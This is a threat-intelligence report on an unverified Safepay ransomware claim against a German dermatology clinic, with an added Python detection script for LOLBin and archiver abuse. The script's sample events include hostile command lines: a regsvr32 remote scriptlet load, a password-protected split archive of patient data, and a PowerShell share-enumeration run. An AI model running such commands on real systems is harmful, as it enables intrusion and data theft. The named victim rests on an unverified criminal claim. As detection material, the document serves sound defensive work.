Hautarzt-Budihardja.de Ransomware by Safepay (May 2026)
Unverified dark web claim. This report is based on a post observed on a dark web forum. Yazoul Security has not independently verified the authenticity of this claim.
Leak Site Screenshot
Screenshot captured at time of discovery. Image blurred to protect victim PII.
Claim Summary
The ransomware group known as Safepay has allegedly claimed responsibility for a cyberattack against the German dermatology clinic operating under the domain hautarzt-budihardja.de. According to the group’s leak site, the attack occurred on May 18, 2026. The clinic, led by Dr. med. Debby Budihardja, a board-certified dermatologist and allergologist, is purportedly the victim of data exfiltration and encryption.
The threat actor has not disclosed the volume of data allegedly stolen, nor has it provided any samples or proof of compromise at this time. This claim has not been independently verified by Yazoul Security or any third-party intelligence source.
Threat Actor Profile
Safepay is a relatively obscure ransomware group with a limited public track record. According to available intelligence, the number of confirmed victims attributed to the group is unknown, and no public research or attribution reports are currently available for this actor.
Known tools associated with Safepay operations include:
- Invoke-ShareFinder – Used for network share enumeration and discovery.
- 7-Zip and WinRAR – Employed for data compression and archiving prior to exfiltration.
- CMSTPLUA – A living-off-the-land (LOLBin) technique that abuses the Microsoft Connection Manager Profile Installer (cmstp.exe) for privilege escalation.
- Regsvr32.exe – Used for code execution via a signed Microsoft binary.
- dllhost.exe – Commonly abused for process hollowing or COM surrogate execution.
The group’s TTPs suggest a reliance on legitimate system tools and LOLBins to evade detection. However, due to the lack of confirmed victims and public research, the group’s operational maturity and credibility remain low. It is possible that Safepay is a rebranded or splinter group, or that this claim is exaggerated or fabricated.
Alleged Data Exposure
The group claims to have exfiltrated data from the clinic’s systems, but has not specified the types of records involved. Given the healthcare vertical, potential data categories could include:
- Patient medical histories and treatment records
- Personally identifiable information (PII) such as names, addresses, and contact details
- Insurance and billing information
- Internal clinic communications and operational data
No file listings, sample documents, or database dumps have been provided by Safepay as of this writing. The absence of proof of compromise is a significant red flag, as established ransomware groups typically release at least partial data to pressure victims.
Potential Impact
If the claim is verified, the impact on hautarzt-budihardja.de could be severe:
- Regulatory consequences: As a German healthcare provider, the clinic is subject to GDPR and the German Patient Data Protection Act (PDSG). A data breach could result in fines up to 4% of annual global turnover or €20 million, whichever is higher.
- Operational disruption: Ransomware encryption may have disrupted patient scheduling, electronic health record access, and billing systems.
- Reputational damage: Patients may lose trust in the clinic’s ability to safeguard sensitive medical data.
- Legal liability: Affected patients could pursue civil claims for damages arising from data exposure.
What to Watch For
- Proof of data: Monitor Safepay’s leak site for any subsequent release of data samples or file lists. If none appear within 7-14 days, the claim is likely a bluff.
- Clinic communications: Watch for official statements from hautarzt-budihardja.de or German health authorities (e.g., BfDI, LfDI) confirming or denying the incident.
- Dark web chatter: Track forums and Telegram channels for any discussions about Safepay’s credibility or additional victim claims.
- YARA rules: No publicly available YARA rules exist for Safepay at this time. Detection guidance should focus on monitoring for the known LOLBin usage patterns (CMSTPLUA, Regsvr32.exe, dllhost.exe) and bulk file compression tools (7-Zip, WinRAR) in unusual contexts.
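Because no YARA rules are available, the practical starting point is process-creation telemetry. The following is an added example (not part of this report and not Safepay tooling) that triages Sysmon-Event-ID-1-style records for the patterns named in the tool list and the detection guidance above: cmstp.exe reading an .inf from a user-writable path, dllhost.exe hosting the CMSTPLUA COM class, regsvr32.exe loading remote or scriptlet content or being spawned by an Office process, archivers run with password or volume-split switches, and PowerShell invoking Invoke-ShareFinder. The events, user names, paths and thresholds are constructed; the CMSTPLUA CLSID is the publicly documented class id, included as a watchlist entry rather than a confirmed Safepay indicator.

```python
"""
Process-creation triage for the LOLBin and archiver patterns listed in the report.
Added example: the events below are constructed, Sysmon-Event-ID-1-style records,
and the rule thresholds are illustrative assumptions, not vendor signatures.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    image: str          # full path of the new process (Sysmon "Image")
    command_line: str   # Sysmon "CommandLine"
    parent_image: str   # Sysmon "ParentImage"
    user: str = ""


# Publicly documented COM class id of CMSTPLUA (Connection Manager profile installer
# elevation interface). Its appearance in a dllhost.exe /Processid argument is a common
# detection hook; it is a watchlist entry here, not a confirmed Safepay indicator.
CMSTPLUA_CLSID = "{3E5FC7F9-9A51-4367-9063-A120244FBEC7}"

ARCHIVERS = {"7z.exe", "7za.exe", "rar.exe", "winrar.exe"}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
USER_WRITABLE = re.compile(r"\\(users|programdata|temp|public|appdata)\\", re.I)


def _basename(path):
    """Lower-cased file name of a Windows path (tolerates forward slashes)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(ev):
    """Return the list of rule names matched by one process-creation event."""
    hits = []
    img = _basename(ev.image)
    parent = _basename(ev.parent_image)
    cl = ev.command_line.lower()

    # cmstp.exe consuming an .inf profile from a user-writable location
    if img == "cmstp.exe" and ".inf" in cl and USER_WRITABLE.search(ev.command_line):
        hits.append("cmstp_inf_user_path")

    # dllhost.exe hosting the CMSTPLUA COM class (privilege-escalation watchlist)
    if img == "dllhost.exe" and "/processid:" in cl and CMSTPLUA_CLSID.lower() in cl:
        hits.append("dllhost_cmstplua_clsid")

    # regsvr32 with a remote or scriptlet payload, or spawned by an Office process
    if img == "regsvr32.exe":
        if "scrobj.dll" in cl or re.search(r"/i:\s*https?://", cl) or ".sct" in cl:
            hits.append("regsvr32_scriptlet_or_remote")
        if parent in OFFICE_PARENTS:
            hits.append("regsvr32_office_parent")

    # archiver run with a password switch (-p / -hp) or split into volumes (-v)
    if img in ARCHIVERS:
        if re.search(r"(^|\s)-h?p\S+", cl):
            hits.append("archiver_password_protected")
        if re.search(r"(^|\s)-v\d+", cl):
            hits.append("archiver_split_volumes")

    # share-enumeration tooling named in the report, launched via PowerShell
    if img in {"powershell.exe", "pwsh.exe"} and "invoke-sharefinder" in cl:
        hits.append("powershell_sharefinder")

    return hits


def scan(events):
    """Return (index, rule) pairs for every event that matched at least one rule."""
    findings = []
    for i, ev in enumerate(events):
        for rule in evaluate(ev):
            findings.append((i, rule))
    return findings


# Constructed sample telemetry: five suspicious events followed by two benign controls.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\cmstp.exe",
              r"cmstp.exe /ni /s C:\Users\anna\AppData\Local\Temp\profile.inf",
              r"C:\Windows\System32\cmd.exe", "CLINIC\\anna"),
    ProcEvent(r"C:\Windows\System32\dllhost.exe",
              "dllhost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}",
              r"C:\Windows\System32\svchost.exe", "CLINIC\\anna"),
    ProcEvent(r"C:\Windows\System32\regsvr32.exe",
              r"regsvr32.exe /s /i:http://192.0.2.10/p.sct C:\Users\anna\AppData\Local\Temp\p.dll",
              r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", "CLINIC\\anna"),
    ProcEvent(r"C:\Program Files\7-Zip\7z.exe",
              r"7z.exe a -pS3cret! -v500m C:\Users\Public\out.7z D:\Praxis\Patienten",
              r"C:\Windows\System32\cmd.exe", "CLINIC\\anna"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -ep bypass -c Invoke-ShareFinder -CheckShareAccess",
              r"C:\Windows\explorer.exe", "CLINIC\\anna"),
    # benign control: scheduled backup archive, no password, no volume split
    ProcEvent(r"C:\Program Files\7-Zip\7z.exe",
              r"7z.exe a \\backup01\nightly\clinic.7z D:\Praxis\Export",
              r"C:\Windows\System32\svchost.exe", "NT AUTHORITY\\SYSTEM"),
    # benign control: regsvr32 registering a vendor component from Program Files
    ProcEvent(r"C:\Windows\System32\regsvr32.exe",
              r'regsvr32.exe /s "C:\Program Files\Vendor\ocx\viewer.ocx"',
              r"C:\Program Files\Vendor\setup.exe", "CLINIC\\Administrator"),
]

if __name__ == "__main__":
    for idx, rule in scan(SAMPLE_EVENTS):
        print(f"event[{idx}] {rule}")
```

The two benign controls matter as much as the hits: the clinic's own nightly backup job and a vendor installer both use the same binaries, so each rule keys on context (password and split switches, user-writable staging paths, Office parents, remote or scriptlet arguments) rather than on the binary name alone, which is the "unusual contexts" qualifier in the guidance above.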
Disclaimer
This report is based solely on unverified claims posted by the Safepay ransomware group on their leak site. Yazoul Security has not independently confirmed the attack, data exfiltration, or any operational impact on hautarzt-budihardja.de. Ransomware groups frequently exaggerate or fabricate claims to pressure victims into paying ransoms. All information should be treated as preliminary and subject to change upon verification. No PII, download links, or access credentials are included in this report.